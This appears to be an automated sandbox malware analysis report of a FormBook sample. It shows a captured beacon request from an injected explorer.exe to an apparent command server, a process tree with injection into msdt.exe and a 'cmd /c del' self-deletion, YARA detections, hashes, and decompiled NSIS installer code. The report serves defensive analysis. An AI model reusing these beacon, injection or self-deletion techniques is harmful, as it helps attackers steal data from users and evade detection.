                                                                              Mar 24, 2021 09:19:35.535001993 CET345INData Raw: 67 5f 70 64 2e 72 5f 77 68 3a 27 26 77 68 3d 27 2b 61 41 78 29 2b 0a 28 67 5f 70 64 2e 72 65 66 5f 6b 65 79 77 6f 72 64 21 3d 3d 65 66 3f 27 26 72 65 66 5f 6b 65 79 77 6f 72 64 3d 27 2b 67 5f 70 64 2e 72 65 66 5f 6b 65 79 77 6f 72 64 3a 27 27 29
                                                                              Data Ascii: g_pd.r_wh:'&wh='+aAx)+(g_pd.ref_keyword!==ef?'&ref_keyword='+g_pd.ref_keyword:'')+(g_pc.$isWhitelisted()?'&abp=1':'')+($IE!==null?'&ie='+$IE:'')+(g_pd.partner!==ef?'&partner='+g_pd.partner:'')+(
                                                                              Mar 24, 2021 09:19:35.535013914 CET346INData Raw: 31 31 35 0d 0a 67 5f 70 64 2e 73 75 62 69 64 31 21 3d 3d 65 66 3f 27 26 73 75 62 69 64 31 3d 27 2b 67 5f 70 64 2e 73 75 62 69 64 31 3a 27 27 29 2b 0a 28 67 5f 70 64 2e 73 75 62 69 64 32 21 3d 3d 65 66 3f 27 26 73 75 62 69 64 32 3d 27 2b 67 5f 70
                                                                              Data Ascii: 115g_pd.subid1!==ef?'&subid1='+g_pd.subid1:'')+(g_pd.subid2!==ef?'&subid2='+g_pd.subid2:'')+(g_pd.subid3!==ef?'&subid3='+g_pd.subid3:'')+(g_pd.subid4!==ef?'&subid4='+g_pd.subid4:'')+(g_pd.subid5!==ef?'&subid5='+g_pd.subid5:'');Sf.appendC


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              9192.168.2.549705217.160.0.6980C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 24, 2021 09:19:47.413953066 CET348OUTGET /nsag/?njndiL=9rtTFPBhfVt4&AjU=UkBnU3nUIfYrxnxuiA7IQSHNtnWcHyh0bpM1KLOn6D8O+IO5Dhvu3uMtlrW7JTyKOcvi HTTP/1.1
                                                                              Host: www.profirma-nachfolge.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Mar 24, 2021 09:19:47.441658974 CET349INHTTP/1.1 404 Not Found
                                                                              Content-Type: text/html
                                                                              Content-Length: 1364
                                                                              Connection: close
                                                                              Date: Wed, 24 Mar 2021 08:19:47 GMT
                                                                              Server: Apache
                                                                              X-Frame-Options: deny
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 73 72 63 3d 22 2f 2f 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 66 72 6d 70 61 72 6b 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63
                                                                              Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"></div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.loc
                                                                              Mar 24, 2021 09:19:47.441704988 CET349INData Raw: 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 44 45 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: ation.host + '/' + 'IONOSParkingDE' + '/park.js">' + '<\/script>' ); </script> </body></html>


                                                                              Code Manipulations

                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              Analysis Process: h8lD4SWL35.exe PID: 480 Parent PID: 5516

                                                                              General

                                                                              Start time:09:17:59
                                                                              Start date:24/03/2021
                                                                              Path:C:\Users\user\Desktop\h8lD4SWL35.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\h8lD4SWL35.exe'
                                                                              Imagebase:0x400000
                                                                              File size:209540 bytes
                                                                              MD5 hash:EFD852E7F72A291CD15D8BCB8148C0FC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.235743198.0000000003150000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.235743198.0000000003150000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.235743198.0000000003150000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: h8lD4SWL35.exe PID: 716 Parent PID: 480

                                                                              General

                                                                              Start time:09:18:00
                                                                              Start date:24/03/2021
                                                                              Path:C:\Users\user\Desktop\h8lD4SWL35.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\h8lD4SWL35.exe'
                                                                              Imagebase:0x400000
                                                                              File size:209540 bytes
                                                                              MD5 hash:EFD852E7F72A291CD15D8BCB8148C0FC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.231719819.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.231719819.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.231719819.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.273894363.00000000005B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.273894363.00000000005B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.273894363.00000000005B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.273962735.00000000009F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.273962735.00000000009F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.273962735.00000000009F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: explorer.exe PID: 3472 Parent PID: 716

                                                                              General

                                                                              Start time:09:18:06
                                                                              Start date:24/03/2021
                                                                              Path:C:\Windows\explorer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:
                                                                              Imagebase:0x7ff693d90000
                                                                              File size:3933184 bytes
                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Chronological Activities

                                                                              Analysis Process: msdt.exe PID: 5880 Parent PID: 3472

                                                                              General

                                                                              Start time:09:18:19
                                                                              Start date:24/03/2021
                                                                              Path:C:\Windows\SysWOW64\msdt.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\msdt.exe
                                                                              Imagebase:0x8e0000
                                                                              File size:1508352 bytes
                                                                              MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.492349966.0000000002EB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.492349966.0000000002EB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.492349966.0000000002EB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.492377238.0000000002EE0000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.492377238.0000000002EE0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.492377238.0000000002EE0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:moderate

                                                                              Chronological Activities

                                                                              Analysis Process: cmd.exe PID: 452 Parent PID: 5880

                                                                              General

                                                                              Start time:09:18:23
                                                                              Start date:24/03/2021
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:/c del 'C:\Users\user\Desktop\h8lD4SWL35.exe'
                                                                              Imagebase:0x920000
                                                                              File size:232960 bytes
                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Chronological Activities

                                                                              Analysis Process: conhost.exe PID: 852 Parent PID: 452

                                                                              General

                                                                              Start time:09:18:24
                                                                              Start date:24/03/2021
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7ecfc0000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Chronological Activities

                                                                              Disassembly

                                                                              Code Analysis

                                                                              Reset < >

                                                                                Analysis Process: h8lD4SWL35.exe PID: 480 Parent PID: 5516 h8lD4SWL35.exeCOMMON

                                                                                Executed Functions

                                                                                Function 004030CB, Relevance: 65.0, APIs: 23, Strings: 14, Instructions: 270filestringcomCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 82%
                                                                                			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				intOrPtr _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f38 = _t34;
				 *0x423e84 = E00405CFB(8);
				SHGetFileInfoA(0x41f430, 0,  &_v360, 0x160, 0); // executed
				E004059DD(0x423680, "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\alfons\\Desktop\\h8lD4SWL35.exe\" ";
				E004059DD(_t96, _t39);
				 *0x423e80 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\alfons\\Desktop\\h8lD4SWL35.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E004054FB(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E004054FB(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								__eflags = _t44 + 2;
								E004059DD(0x429400, _t44 + 2);
								L20:
								_t105 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105); // executed
								_t48 = E00403097(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C22(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E0040344C();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x423f14;
											if( *0x423f14 != 0) {
												_t106 = E00405CFB(3);
												_t100 = E00405CFB(4);
												_t55 = E00405CFB(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x423f2c;
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E0040529E(_v408, 0x200010);
										ExitProcess(2);
									}
									if( *0x423e9c == 0) {
										L31:
										 *0x423f2c =  *0x423f2c | 0xffffffff;
										_v400 = E00403526();
										goto L32;
									}
									_t103 = E004054FB(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										if(lstrcmpiA(_t105, "C:\\Users\\alfons\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 =  *0x429400; // 0x0
										if(_t120 == 0) {
											E004059DD(0x429400, "C:\\Users\\alfons\\Desktop");
										}
										E004059DD(0x424000, _v396);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											E004059FF(0, _t98, 0x41f030, 0x41f030,  *((intOrPtr*)( *0x423e90 + 0x120)));
											DeleteFileA(0x41f030);
											if(_v416 != 0 && CopyFileA("C:\\Users\\alfons\\Desktop\\h8lD4SWL35.exe", 0x41f030, 1) != 0) {
												_push(0);
												_push(0x41f030);
												E0040572B();
												E004059FF(0, _t98, 0x41f030, 0x41f030,  *((intOrPtr*)( *0x423e90 + 0x124)));
												_t79 = E0040523D(0x41f030);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E0040572B();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E004055B1(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E004059DD(0x429400, _t104);
									E004059DD(0x429800, _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E00403097(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}






































                                                                                0x004030d7
                                                                                0x004030db
                                                                                0x004030e3
                                                                                0x004030e5
                                                                                0x004030ea
                                                                                0x004030f5
                                                                                0x004030fc
                                                                                0x00403104
                                                                                0x0040310e
                                                                                0x00403124
                                                                                0x00403134
                                                                                0x00403139
                                                                                0x0040313f
                                                                                0x00403146
                                                                                0x00403159
                                                                                0x0040315e
                                                                                0x00403160
                                                                                0x00403162
                                                                                0x00403167
                                                                                0x00403167
                                                                                0x00403177
                                                                                0x0040317d
                                                                                0x004031e6
                                                                                0x004031e6
                                                                                0x004031e8
                                                                                0x004031ea
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403183
                                                                                0x00403186
                                                                                0x0040318e
                                                                                0x0040318e
                                                                                0x00403191
                                                                                0x00403196
                                                                                0x00403198
                                                                                0x00403198
                                                                                0x00403199
                                                                                0x00403199
                                                                                0x0040319e
                                                                                0x004031a1
                                                                                0x004031d6
                                                                                0x004031db
                                                                                0x004031e0
                                                                                0x004031e3
                                                                                0x004031e5
                                                                                0x004031e5
                                                                                0x004031e5
                                                                                0x00000000
                                                                                0x004031a3
                                                                                0x004031a3
                                                                                0x004031a4
                                                                                0x004031a7
                                                                                0x004031af
                                                                                0x004031b2
                                                                                0x004031b4
                                                                                0x004031b4
                                                                                0x004031b4
                                                                                0x004031b2
                                                                                0x004031b7
                                                                                0x004031bd
                                                                                0x004031c5
                                                                                0x004031c8
                                                                                0x004031ca
                                                                                0x004031ca
                                                                                0x004031ca
                                                                                0x004031c8
                                                                                0x004031cd
                                                                                0x004031d4
                                                                                0x004031ee
                                                                                0x004031f1
                                                                                0x004031fa
                                                                                0x004031ff
                                                                                0x004031ff
                                                                                0x0040320a
                                                                                0x00403210
                                                                                0x00403215
                                                                                0x00403217
                                                                                0x00403239
                                                                                0x0040323e
                                                                                0x00403245
                                                                                0x0040324c
                                                                                0x00403250
                                                                                0x004032b7
                                                                                0x004032b7
                                                                                0x004032bc
                                                                                0x004032c6
                                                                                0x004033b1
                                                                                0x004033b7
                                                                                0x004033c2
                                                                                0x004033cb
                                                                                0x004033cd
                                                                                0x004033d2
                                                                                0x004033d4
                                                                                0x004033d6
                                                                                0x004033d8
                                                                                0x004033da
                                                                                0x004033dc
                                                                                0x004033de
                                                                                0x004033ee
                                                                                0x004033f0
                                                                                0x004033f2
                                                                                0x004033ff
                                                                                0x0040340e
                                                                                0x00403416
                                                                                0x0040341e
                                                                                0x0040341e
                                                                                0x004033f2
                                                                                0x004033de
                                                                                0x004033da
                                                                                0x00403423
                                                                                0x00403429
                                                                                0x0040342b
                                                                                0x0040342f
                                                                                0x0040342f
                                                                                0x0040342b
                                                                                0x00403434
                                                                                0x00403439
                                                                                0x0040343c
                                                                                0x0040343e
                                                                                0x0040343e
                                                                                0x00403446
                                                                                0x00403446
                                                                                0x004032d5
                                                                                0x004032dc
                                                                                0x004032dc
                                                                                0x00403258
                                                                                0x004032a7
                                                                                0x004032a7
                                                                                0x004032b3
                                                                                0x00000000
                                                                                0x004032b3
                                                                                0x00403261
                                                                                0x0040326e
                                                                                0x00403265
                                                                                0x0040326b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040326d
                                                                                0x0040326d
                                                                                0x0040326d
                                                                                0x00403272
                                                                                0x00403274
                                                                                0x0040327c
                                                                                0x004032e8
                                                                                0x004032fc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403300
                                                                                0x00403307
                                                                                0x0040330d
                                                                                0x00403313
                                                                                0x0040331b
                                                                                0x0040331b
                                                                                0x00403329
                                                                                0x00403330
                                                                                0x00403339
                                                                                0x0040333f
                                                                                0x0040334b
                                                                                0x00403351
                                                                                0x0040335b
                                                                                0x0040336f
                                                                                0x00403370
                                                                                0x00403371
                                                                                0x00403382
                                                                                0x00403388
                                                                                0x0040338f
                                                                                0x00403392
                                                                                0x00403398
                                                                                0x00403398
                                                                                0x0040338f
                                                                                0x0040339c
                                                                                0x004033a2
                                                                                0x004033a2
                                                                                0x004033a5
                                                                                0x004033a6
                                                                                0x004033a7
                                                                                0x00000000
                                                                                0x004033a7
                                                                                0x0040327e
                                                                                0x00403280
                                                                                0x0040328b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403293
                                                                                0x0040329e
                                                                                0x004032a3
                                                                                0x00000000
                                                                                0x004032a3
                                                                                0x0040321f
                                                                                0x0040322b
                                                                                0x00403230
                                                                                0x00403235
                                                                                0x00403237
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403237
                                                                                0x00000000
                                                                                0x004031d4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403188
                                                                                0x00403188
                                                                                0x00403188
                                                                                0x00403189
                                                                                0x00403189
                                                                                0x00000000
                                                                                0x00403188
                                                                                0x00000000

                                                                                APIs
                                                                                • #17.COMCTL32 ref: 004030EA
                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 004030F5
                                                                                • OleInitialize.OLE32(00000000), ref: 004030FC
                                                                                  • Part of subcall function 00405CFB: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D0D
                                                                                  • Part of subcall function 00405CFB: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D18
                                                                                  • Part of subcall function 00405CFB: GetProcAddress.KERNEL32(00000000,?), ref: 00405D29
                                                                                • SHGetFileInfoA.SHELL32(0041F430,00000000,?,00000160,00000000,00000008), ref: 00403124
